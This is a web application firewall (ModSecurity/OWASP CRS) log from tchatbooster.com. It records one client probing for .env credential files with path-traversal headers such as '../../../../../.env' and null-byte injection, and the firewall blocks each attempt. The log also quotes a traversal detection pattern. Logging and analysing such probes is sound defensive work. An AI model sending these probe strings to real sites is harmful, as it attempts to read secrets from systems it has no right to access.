[Tue May 12 04:39:25.982917 2026] [security2:error] [pid 1730175:tid 1730192] [client 45.148.10.166:37448] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 12 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Invalid character in request (null character)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS3Xo6NvB9WXx5V-6e4wAAAQ8"]
[Tue May 12 04:39:26.009149 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKS3jue9Sp-pIv_Bb61SAAAAUQ"], referer: https://tchatbooster.com/api/health?X-App-Env=%00
[Tue May 12 04:39:26.009203 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:Referer outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKS3jue9Sp-pIv_Bb61SAAAAUQ"], referer: https://tchatbooster.com/api/health?X-App-Env=%00
[Tue May 12 04:39:26.009243 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKS3jue9Sp-pIv_Bb61SAAAAUQ"], referer: https://tchatbooster.com/api/health?X-App-Env=%00
[Tue May 12 04:39:26.009276 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKS3jue9Sp-pIv_Bb61SAAAAUQ"], referer: https://tchatbooster.com/api/health?X-App-Env=%00
[Tue May 12 04:39:26.010115 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 16)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKS3jue9Sp-pIv_Bb61SAAAAUQ"], referer: https://tchatbooster.com/api/health?X-App-Env=%00
[Tue May 12 04:39:26.114585 2026] [security2:error] [pid 1825179:tid 1825218] [client 45.148.10.166:37408] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS3dr1yOh9TvizeziP3gAAAFQ"]
[Tue May 12 04:39:26.133592 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:37416] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/var/www/html/.env"] [unique_id "agKS3tr1yOh9TvizeziP4AAAAFY"], referer: https://tchatbooster.com/var/www/html/.env
[Tue May 12 04:39:26.133812 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:37416] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/var/www/html/.env"] [unique_id "agKS3tr1yOh9TvizeziP4AAAAFY"], referer: https://tchatbooster.com/var/www/html/.env
[Tue May 12 04:39:26.169236 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.166:37388] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS3c1tk6y7yBJLpJoptQAAAIw"], referer: https://tchatbooster.com/assets../../.env
[Tue May 12 04:39:26.193244 2026] [core:error] [pid 1825179:tid 1825218] [client 45.148.10.166:37408] AH10244: invalid URI path (/assets../../../.env)
[Tue May 12 04:39:26.587007 2026] [security2:error] [pid 1825287:tid 1825311] [client 45.148.10.166:57192] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS3QgpmE1yW0glLdgfPQAAAMY"]
[Tue May 12 04:39:26.606162 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.166:37388] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/api/.env"] [unique_id "agKS3s1tk6y7yBJLpJopuAAAAIw"], referer: https://tchatbooster.com/api/.env
[Tue May 12 04:39:26.606380 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.166:37388] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/api/.env"] [unique_id "agKS3s1tk6y7yBJLpJopuAAAAIw"], referer: https://tchatbooster.com/api/.env
[Tue May 12 04:39:26.793740 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 16 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Invalid character in request (null character)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS3jue9Sp-pIv_Bb61SAAAAUQ"], referer: https://tchatbooster.com/api/health?X-App-Env=%00
[Tue May 12 04:39:26.821657 2026] [security2:error] [pid 1825287:tid 1825311] [client 45.148.10.166:57192] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/health"] [unique_id "agKS3ggpmE1yW0glLdgfPwAAAMY"]
[Tue May 12 04:39:26.821702 2026] [security2:error] [pid 1825287:tid 1825311] [client 45.148.10.166:57192] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/health"] [unique_id "agKS3ggpmE1yW0glLdgfPwAAAMY"]
[Tue May 12 04:39:26.821730 2026] [security2:error] [pid 1825287:tid 1825311] [client 45.148.10.166:57192] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/health"] [unique_id "agKS3ggpmE1yW0glLdgfPwAAAMY"]
[Tue May 12 04:39:26.821943 2026] [security2:error] [pid 1825287:tid 1825311] [client 45.148.10.166:57192] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/health"] [unique_id "agKS3ggpmE1yW0glLdgfPwAAAMY"]
[Tue May 12 04:39:26.821993 2026] [security2:error] [pid 1825287:tid 1825311] [client 45.148.10.166:57192] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/health"] [unique_id "agKS3ggpmE1yW0glLdgfPwAAAMY"]
[Tue May 12 04:39:26.822027 2026] [security2:error] [pid 1825287:tid 1825311] [client 45.148.10.166:57192] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/health"] [unique_id "agKS3ggpmE1yW0glLdgfPwAAAMY"]
[Tue May 12 04:39:26.822439 2026] [security2:error] [pid 1825287:tid 1825311] [client 45.148.10.166:57192] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/health"] [unique_id "agKS3ggpmE1yW0glLdgfPwAAAMY"]
[Tue May 12 04:39:26.895938 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:37416] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS3tr1yOh9TvizeziP4AAAAFY"], referer: https://tchatbooster.com/var/www/html/.env
[Tue May 12 04:39:27.070217 2026] [security2:error] [pid 1730175:tid 1730192] [client 45.148.10.166:37448] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/public/.env"] [unique_id "agKS33o6NvB9WXx5V-6e5gAAAQ8"]
[Tue May 12 04:39:27.070486 2026] [security2:error] [pid 1730175:tid 1730192] [client 45.148.10.166:37448] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/public/.env"] [unique_id "agKS33o6NvB9WXx5V-6e5gAAAQ8"]
[Tue May 12 04:39:27.070667 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:37416] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKS39r1yOh9TvizeziP4wAAAFY"], referer: https://tchatbooster.com/assets../../../.env
[Tue May 12 04:39:27.070818 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:37416] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKS39r1yOh9TvizeziP4wAAAFY"], referer: https://tchatbooster.com/assets../../../.env
[Tue May 12 04:39:27.252752 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.166:37388] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS3s1tk6y7yBJLpJopuAAAAIw"], referer: https://tchatbooster.com/api/.env
[Tue May 12 04:39:27.358229 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/api/.env"] [unique_id "agKS381tk6y7yBJLpJopuQAAAIU"]
[Tue May 12 04:39:27.358428 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/api/.env"] [unique_id "agKS381tk6y7yBJLpJopuQAAAIU"]
[Tue May 12 04:39:27.571676 2026] [security2:error] [pid 1825287:tid 1825311] [client 45.148.10.166:57192] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS3ggpmE1yW0glLdgfPwAAAMY"]
[Tue May 12 04:39:27.601015 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.166:37388] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKS381tk6y7yBJLpJopuwAAAIw"], referer: https://tchatbooster.com/health?X-App-Env=%00
[Tue May 12 04:39:27.601074 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.166:37388] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:Referer outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKS381tk6y7yBJLpJopuwAAAIw"], referer: https://tchatbooster.com/health?X-App-Env=%00
[Tue May 12 04:39:27.601109 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.166:37388] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKS381tk6y7yBJLpJopuwAAAIw"], referer: https://tchatbooster.com/health?X-App-Env=%00
[Tue May 12 04:39:27.601139 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.166:37388] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKS381tk6y7yBJLpJopuwAAAIw"], referer: https://tchatbooster.com/health?X-App-Env=%00
[Tue May 12 04:39:27.601358 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.166:37388] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKS381tk6y7yBJLpJopuwAAAIw"], referer: https://tchatbooster.com/health?X-App-Env=%00
[Tue May 12 04:39:27.601411 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.166:37388] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKS381tk6y7yBJLpJopuwAAAIw"], referer: https://tchatbooster.com/health?X-App-Env=%00
